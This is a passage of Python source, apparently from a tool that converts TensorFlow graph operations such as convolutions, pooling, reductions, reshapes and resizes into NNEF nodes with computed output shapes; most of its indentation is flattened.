_uid=self.gen_node_name(tfnode.name) + '_r_filter',
_output_shape=[channels, shape[1]+channels],
_np_tensor=np.random.randn(*[channels, shape[1]+channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
r_filter.tensor_data_file.write_to_disk(r_filter.parameters['label'] + '.dat')
s_filter = node.Variable(shape=[channels, shape[1]+channels],
label=scope + '/s/filter',
_uid=self.gen_node_name(tfnode.name) + '_s_filter',
_output_shape=[channels, shape[1]+channels],
_np_tensor=np.random.randn(*[channels, shape[1]+channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
s_filter.tensor_data_file.write_to_disk(s_filter.parameters['label'] + '.dat')
z_bias = node.Variable(shape=[1, channels],
label=scope + '/z/bias',
_uid=self.gen_node_name(tfnode.name) + '_z_bias',
_output_shape=[1, channels],
_np_tensor=np.random.randn(*[1, channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
z_bias.tensor_data_file.write_to_disk(z_bias.parameters['label'] + '.dat')
r_bias = node.Variable(shape=[1, channels],
label=scope + '/r/bias',
_uid=self.gen_node_name(tfnode.name) + '_r_bias',
_output_shape=[1, channels],
_np_tensor=np.random.randn(*[1, channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
r_bias.tensor_data_file.write_to_disk(r_bias.parameters['label'] + '.dat')
s_bias = node.Variable(shape=[1, channels],
label=scope + '/s/bias',
_uid=self.gen_node_name(tfnode.name) + '_s_bias',
_output_shape=[1, channels],
_np_tensor=np.random.randn(*[1, channels]).astype(np.float32),
_np_dtype=np.dtype(np.float32))
s_bias.tensor_data_file.write_to_disk(s_bias.parameters['label'] + '.dat')
nnef_node_gru = node.Gru(input=nnef_node_reshape,
channels=channels,
scope=scope,
_uid=self.gen_node_name(tfnode.name) + '_gru',
_output_shape=nnef_node_reshape.output_shape[:])
self.node_pool[nnef_node_gru.name] = nnef_node_gru
shape_2 = [1, 1, channels]
nnef_node = node.Reshape(input=nnef_node_gru,
shape=shape_2,
_uid=self.gen_node_name(tfnode.name),
_output_shape=shape_2,
_maintain_format=False)
return nnef_node, tf_inputs, {}
def import_DepthwiseConv2dNative(self, tfnode):
tf_inputs = {'input': 0, 'filter':1}
rank = 4
data_format = tfnode.attr['data_format'].s.decode('ascii')
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_filter = self.get_node_from_pool(tfnode, tf_inputs['filter'])
groups = nnef_node_input.output_shape[data_format.index('C')]
padding = self.new_get_attr(tfnode, 'padding', rank-2, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = self.new_get_attr(tfnode, 'dilations', None, data_format)
strides = strides[2:]
dilations = dilations[2:]
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
for i in range(2, len(pad_array)):
padding.append((pad_array[i][0], pad_array[i][1]))
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape[:]
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_filter.op == 'variable':
filter_tdf = nnef_node_filter.get_tensordatafile()
nnef_tensor = filter_tdf.get_data().get_array()[0]
shape = list(np.shape(nnef_tensor))
nnef_tensor = np.reshape(nnef_tensor, [shape[0], shape[1], shape[2]*shape[3], 1])
nnef_tensor = np.transpose(nnef_tensor, [2, 3, 0, 1])
filter_tdf.get_data().set_array(nnef_tensor)
new_shape = list(np.shape(filter_tdf.get_data().get_array()[0]))
filter_tdf.header.set_tensor_dimensions(new_shape)
nnef_node_filter.parameters['shape'] = new_shape
nnef_node_filter.output_shape = new_shape
else:
new_shape = [1]*len(in_shape)
#Calculate output shape
output_shape = len(in_shape) * [0]
output_shape[0] = in_shape[0]
output_shape[1] = new_shape[1] * new_shape[0]
for i in range(2, len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i - 2])
else:
fd = (new_shape[i] - 1) * dilations[i - 2] + 1
padding_add = padding[i - 2][0] + padding[i - 2][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i - 2]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Conv(input=nnef_node_input,
filter=nnef_node_filter,
padding=padding,
stride=strides,
dilation=dilations,
groups=groups,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_Elu(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Elu(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Equal(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.EQ(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Exp(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Exp(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_ExpandDims(self, tfnode):
tf_inputs = {'input': 0}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
output_shape = nnef_node_input.output_shape[:]
axis = int(self.get_node_from_pool(tfnode, 1).parameters['value'][0])
output_shape.insert(axis, 1)
nnef_node = node.Reshape(input=nnef_node_input,
shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_maintain_format=True)
return nnef_node, tf_inputs, attrs
def import_Floor(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Floor(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_FusedBatchNorm(self, tfnode):
tf_inputs = {'input': 0, 'scale': 1, 'offset': 2, 'mean': 3, 'variance': 4}
data_format = tfnode.attr['data_format'].s.decode('ascii')
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_scale = self.get_node_from_pool(tfnode, tf_inputs['scale'])
nnef_node_offset = self.get_node_from_pool(tfnode, tf_inputs['offset'])
nnef_node_mean = self.get_node_from_pool(tfnode, tf_inputs['mean'])
nnef_node_variance = self.get_node_from_pool(tfnode, tf_inputs['variance'])
epsilon = self.new_get_attr(tfnode, 'epsilon', None)
output_shape = nnef_node_input.output_shape[:]
nnef_node = node.BatchNormalization(input=nnef_node_input,
mean=nnef_node_mean,
variance=nnef_node_variance,
offset=nnef_node_offset,
scale=nnef_node_scale,
epsilon=epsilon,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'epsilon': epsilon, 'data_format': data_format}
return nnef_node, tf_inputs, attrs
def import_Greater(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.GT(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_GreaterEqual(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.GE(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Identity(self, tfnode):
if self.gen_node_name(tfnode.name) == self.gen_node_name(tfnode.input[0]):
return None, None, None
else:
self.removed_nodes += 1
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Idn(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Less(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.LT(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LessEqual(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.LE(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Log(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Log(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LogicalAnd(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.And(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LogicalNot(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Not(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LogicalOr(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Or(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_LRN(self, tfnode):
tf_inputs = {'input': 0}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
output_shape = nnef_node_input.output_shape[:]
alpha = tfnode.attr['alpha'].f
beta = tfnode.attr['beta'].f
bias = tfnode.attr['bias'].f
size = [1, tfnode.attr['depth_radius'].i, 1, 1]
nnef_node = node.LocalResponseNormalization(input=nnef_node_input,
alpha=alpha,
beta=beta,
bias=bias,
size=size,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
attrs = {'alpha' :alpha, 'beta': beta, 'bias': bias, 'depth_radius': size}
return nnef_node, tf_inputs, attrs
def import_MatMul(self, tfnode):
tf_inputs = {'A': 0, 'B': 1}
nnef_node_A = self.get_node_from_pool(tfnode, tf_inputs['A'])
nnef_node_B = self.get_node_from_pool(tfnode, tf_inputs['B'])
output_shape = []
for i in nnef_node_A.output_shape[0:-1]:
output_shape.append(i)
for i in nnef_node_B.output_shape[1:]:
output_shape.append(i)
trA = self.new_get_attr(tfnode, 'transpose_a', None)
trB = self.new_get_attr(tfnode, 'transpose_b', None)
nnef_node = node.Matmul(A=nnef_node_A,
B=nnef_node_B,
transposeA=trA,
transposeB=trB,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
attrs = {'transpose_a': trA, 'transpose_b': trB}
return nnef_node, tf_inputs, attrs
def import_Max(self, tfnode):
tf_inputs = {'input': 0, 'axis':1}
attrs = {'keep_dims': None}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_axis.op == 'variable':
shape = nnef_node_axis.get_tensordatafile().get_data().get_array()[0][0]
else:
shape = [int(nnef_node_axis.parameters['value'][0])]
axes = []
for i in shape:
if i not in axes:
axes.append(i)
axes.sort()
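# E.g. a raw axis tensor of [2, 0, 2] (hypothetical) deduplicates and
# sorts to axes == [0, 2].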
self.remove_node_from_pool(nnef_node_axis)
output_shape = input_shape[:]
if tfnode.attr['keep_dims'].b or tfnode.attr['keepdims'].b:
for i in axes:
output_shape[i] = 1
nnef_node_max = node.MaxReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name) + '_max',)
self.node_pool[nnef_node_max.name] = nnef_node_max
nnef_node = node.Reshape(input=nnef_node_max,
shape=output_shape,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_maintain_format=True)
else:
axes.sort(reverse=True)
for i in axes:
output_shape.pop(i)
if output_shape == []:
output_shape = [1]
axes.sort()
nnef_node = node.MaxReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name))
return nnef_node, tf_inputs, attrs
def import_Maximum(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Max(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_MaxPool(self, tfnode):
rank = 4
tf_inputs = {'input':0}
data_format = tfnode.attr['data_format'].s.decode('ascii')
padding = self.new_get_attr(tfnode, 'padding', rank, data_format)
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
padding.append((pad_array[0][0], pad_array[0][1]))
padding.append((pad_array[-1][0], pad_array[-1][1]))
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
    for i in range(len(pad_array)):
        padding.append((pad_array[i][0], pad_array[i][1]))
sizes = self.new_get_attr(tfnode, 'ksize', None, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = [1, 1, 1, 1]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
#Calculate output shape
output_shape = len(in_shape) * [0]
for i in range(len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i])
else:
fd = (sizes[i] - 1) * dilations[i] + 1
padding_add = padding[i][0] + padding[i][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node = node.MaxPool(input=nnef_node_input,
size=sizes,
padding=padding,
stride=strides,
dilation=dilations,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
attrs = {'padding': padding, 'strides': strides, 'dilations': dilations}
return nnef_node, tf_inputs, attrs
def import_MaxPoolWithArgmax(self, tfnode):
tf_inputs = {'input':0}
data_format = 'NHWC'
padding = self.new_get_attr(tfnode, 'padding', 4, data_format)
main_nnef_node_name = self.gen_node_name(tfnode.name) + ', ' + self.gen_node_name(tfnode.name + ':1')
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
if nnef_node_input.op == 'pad':
pad_array = nnef_node_input.parameters['padding']
nnef_node_input = nnef_node_input.parameters['input']
padding = []
if data_format == 'NHWC':
padding.append((pad_array[0][0], pad_array[0][1]))
padding.append((pad_array[-1][0], pad_array[-1][1]))
for i in range(1, len(pad_array)-1):
padding.append((pad_array[i][0], pad_array[i][1]))
else:
    for i in range(len(pad_array)):
        padding.append((pad_array[i][0], pad_array[i][1]))
sizes = self.new_get_attr(tfnode, 'ksize', None, data_format)
strides = self.new_get_attr(tfnode, 'strides', None, data_format)
dilations = [1, 1, 1, 1]
#Modify tensor data for filter
in_shape = nnef_node_input.output_shape
in_shape = convert_format(in_shape, data_format, 'NCHW')
if nnef_node_input.op == 'reshape':
nnef_node_input.parameters['shape'] = in_shape
#Calculate output shape
output_shape = len(in_shape) * [0]
for i in range(len(in_shape)):
if padding == []:
output_shape[i] = math.ceil(in_shape[i] / strides[i])
else:
fd = (sizes[i] - 1) * dilations[i] + 1
padding_add = padding[i][0] + padding[i][1]
output_shape[i] = math.floor((in_shape[i] + padding_add - fd) / strides[i]) + 1
output_shape = convert_format(output_shape, 'NCHW', data_format)
output_shape = [int(v) for v in output_shape]
nnef_node_main = node.MaxPoolWithIndex(input=nnef_node_input,
padding=padding,
size=sizes,
stride=strides,
dilation=dilations,
_uid=main_nnef_node_name,
_output_shape=output_shape,
_data_format=data_format)
nnef_node_pool = node.OutputVal(base_node=nnef_node_main,
base_index=0,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=data_format)
self.node_pool[nnef_node_pool.name] = nnef_node_pool
nnef_node_index = node.OutputVal(base_node=nnef_node_main,
base_index=1,
_uid=self.gen_node_name(tfnode.name + ':1'),
_output_shape=output_shape)
self.node_pool[nnef_node_index.name] = nnef_node_index
attrs = {'padding': padding, 'ksize': sizes, 'strides': strides}
return nnef_node_main, tf_inputs, attrs
def import_Mean(self, tfnode):
tf_inputs = {'input': 0, 'axis':1}
attrs = {'keep_dims': None}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_axis.op == 'variable':
shape = nnef_node_axis.get_tensordatafile().get_data().get_array()[0][0]
else:
shape = [int(nnef_node_axis.parameters['value'][0])]
axes = []
for i in shape:
if i not in axes:
axes.append(i)
axes.sort()
self.remove_node_from_pool(nnef_node_axis)
output_shape = input_shape[:]
if tfnode.attr['keep_dims'].b or tfnode.attr['keepdims'].b:
for i in axes:
output_shape[i] = 1
nnef_node_mean = node.MeanReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name) + '_mean',)
self.node_pool[nnef_node_mean.name] = nnef_node_mean
nnef_node = node.Reshape(input=nnef_node_mean,
shape=output_shape,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_maintain_format=True)
else:
axes.sort(reverse=True)
for i in axes:
output_shape.pop(i)
if output_shape == []:
output_shape = [1]
axes.sort()
nnef_node = node.MeanReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name))
return nnef_node, tf_inputs, attrs
def import_Minimum(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Min(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=tfnode.attr['data_format'])
return nnef_node, tf_inputs, attrs
def import_Mul(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Mul(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=tfnode.attr['data_format'])
return nnef_node, tf_inputs, attrs
def import_Neg(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Neg(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_NotEqual(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.NE(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Pack(self, tfnode):
tf_inputs = {}
attrs = {'axis':None}
nnef_nodes = []
for i in range(len(tfnode.input)):
nnef_node_val = self.get_node_from_pool(tfnode, i)
nnef_nodes.append(nnef_node_val)
tf_inputs['value_' + str(i)] = i
axis = tfnode.attr['axis'].i
output_shape = nnef_nodes[0].output_shape[:]
output_shape.insert(axis, len(nnef_nodes))
nnef_node = node.Stack(values=nnef_nodes,
axis=axis,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Pad(self, tfnode):
tf_inputs = {'input': 0, 'pads' : 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_pad = self.get_node_from_pool(tfnode, tf_inputs['pads'])
if nnef_node_pad.op == 'variable' and nnef_node_pad.parameters['shape'][0] > 1:
padding = nnef_node_pad.get_tensordatafile().get_data().get_array()[0]
nnef_node = node.Pad(input=nnef_node_input,
padding=padding,
_uid=self.gen_node_name(tfnode.name),
_output_shape=nnef_node_input.output_shape[:])
else:
raise ValueError("Currently unsupported pad arguments")
return nnef_node, tf_inputs, attrs
def import_Placeholder(self, tfnode):
size = []
shape = self._get_attr(tfnode, 'shape')
if shape is None:
    # No shape attribute on the placeholder: fall back to a common
    # image-classification input size (an assumption, not graph data).
    size = [1, 224, 224, 3]
else:
for dimen in shape.dim:
size.append(dimen.size)
if size[0] < 0:
shape = [1]
else:
shape = [size[0]]
for i in range(1, len(size)):
shape.append(size[i])
if self.start_length == 0:
self.start_length = len(shape)
nnef_node = node.External(shape=shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=shape)
inputs = {}
attrs = {'shape': None}
return nnef_node, inputs, attrs
def import_PlaceholderWithDefault(self, tfnode):
self.name_convs[self.gen_node_name(tfnode.name)] = self.gen_node_name(tfnode.input[0])
return None, None, None
def import_Pow(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Pow(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_RealDiv(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Div(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Relu(self, tfnode):
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Relu(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,)
return nnef_node, tf_inputs, attrs
def import_Relu6(self, tfnode):
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node_relu = node.Relu(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name)+'_relu',
_output_shape=output_shape)
self.node_pool[nnef_node_relu.name] = nnef_node_relu
nnef_node = node.Min(x=nnef_node_relu,
y=6.0,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Reshape(self, tfnode):
tf_inputs = {'input': 0, 'shape': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_shape = self.get_node_from_pool(tfnode, tf_inputs['shape'])
self.name_convs[nnef_node_input.name] = self.gen_node_name(tfnode.name)
shape = None
if nnef_node_shape.op == 'variable':
shape = list(nnef_node_shape.get_tensordatafile().get_data().get_array()[0][0])
self.remove_node_from_pool(nnef_node_shape)
elif nnef_node_shape.op == 'shape_of':
shape = nnef_node_shape.output_shape[:]
else:
shape = list(np.reshape(np.asarray(nnef_node_shape.get_value(), dtype=np.int32), [-1]))
self.remove_node_from_pool(nnef_node_shape)
# Model-specific workaround: hard-coded reshape override for a known graph.
if shape == [-1, 10, 768] and tfnode.name == 'Reshape_4':
    shape = [1, 1, 768]
in_shape = nnef_node_input.output_shape[:]
output_shape = []
for i in shape:
output_shape.append(i)
if -1 in output_shape:
in_size = 1
for i in in_shape:
in_size *= i
neg_index = -1
for i in range(len(output_shape)):
if output_shape[i] == -1:
neg_index = i
else:
in_size = in_size/output_shape[i]
output_shape[neg_index] = int(in_size)
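# E.g. (hypothetical) in_shape [1, 7, 7, 1024] with requested shape
# [-1, 1024]: in_size = 50176, so the -1 slot becomes 50176 / 1024 = 49
# and output_shape == [49, 1024].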
output_shape = [int(v) for v in output_shape]
nnef_node = node.Reshape(input=nnef_node_input,
shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_maintain_format=False)
return nnef_node, tf_inputs, attrs
def import_ResizeArea(self, tfnode):
if self.start_format is None:
self.start_format = 'NHWC'
tf_inputs = {'input':0, 'factor': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_factor = self.get_node_from_pool(tfnode, tf_inputs['factor'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_factor.op == 'variable':
output_size = nnef_node_factor.get_tensordatafile().get_data().get_array()[0][0]
self.remove_node_from_pool(nnef_node_factor)
else:
print(nnef_node_factor.op)
assert False, "Not currently handled"
factor = []
output_shape = [input_shape[0]]
for i in range(len(input_shape[1:-1])):
assert input_shape[i+1]%output_size[i] == 0, "Unable to convert, ResizeArea uses non-integer factors"
factor.append(int(input_shape[i+1]/output_size[i]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.AreaDownsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
return nnef_node, tf_inputs, attrs
def import_ResizeBilinear(self, tfnode):
if self.start_format is None:
self.start_format = 'NHWC'
tf_inputs = {'input':0, 'factor': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_factor = self.get_node_from_pool(tfnode, tf_inputs['factor'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_factor.op == 'variable':
output_size = nnef_node_factor.get_tensordatafile().get_data().get_array()[0][0]
self.remove_node_from_pool(nnef_node_factor)
else:
print(nnef_node_factor.op)
assert False, "Not currently handled"
factor = []
output_shape = [input_shape[0]]
for i in range(len(input_shape[1:-1])):
assert output_size[i]%input_shape[i+1] == 0, "Unable to convert, ResizeBilinear uses non-integer factors"
factor.append(int(output_size[i]/input_shape[i+1]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.MultilinearUpsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
return nnef_node, tf_inputs, attrs
def import_ResizeNearestNeighbor(self, tfnode):
if self.start_format is None:
self.start_format = 'NHWC'
tf_inputs = {'input':0, 'factor': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_factor = self.get_node_from_pool(tfnode, tf_inputs['factor'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_factor.op == 'variable':
output_size = nnef_node_factor.get_tensordatafile().get_data().get_array()[0][0]
self.remove_node_from_pool(nnef_node_factor)
else:
print(nnef_node_factor.op)
assert False, "Not currently handled"
factor = []
output_shape = [input_shape[0]]
if input_shape[1] < output_size[0]:
for i in range(len(input_shape[1:-1])):
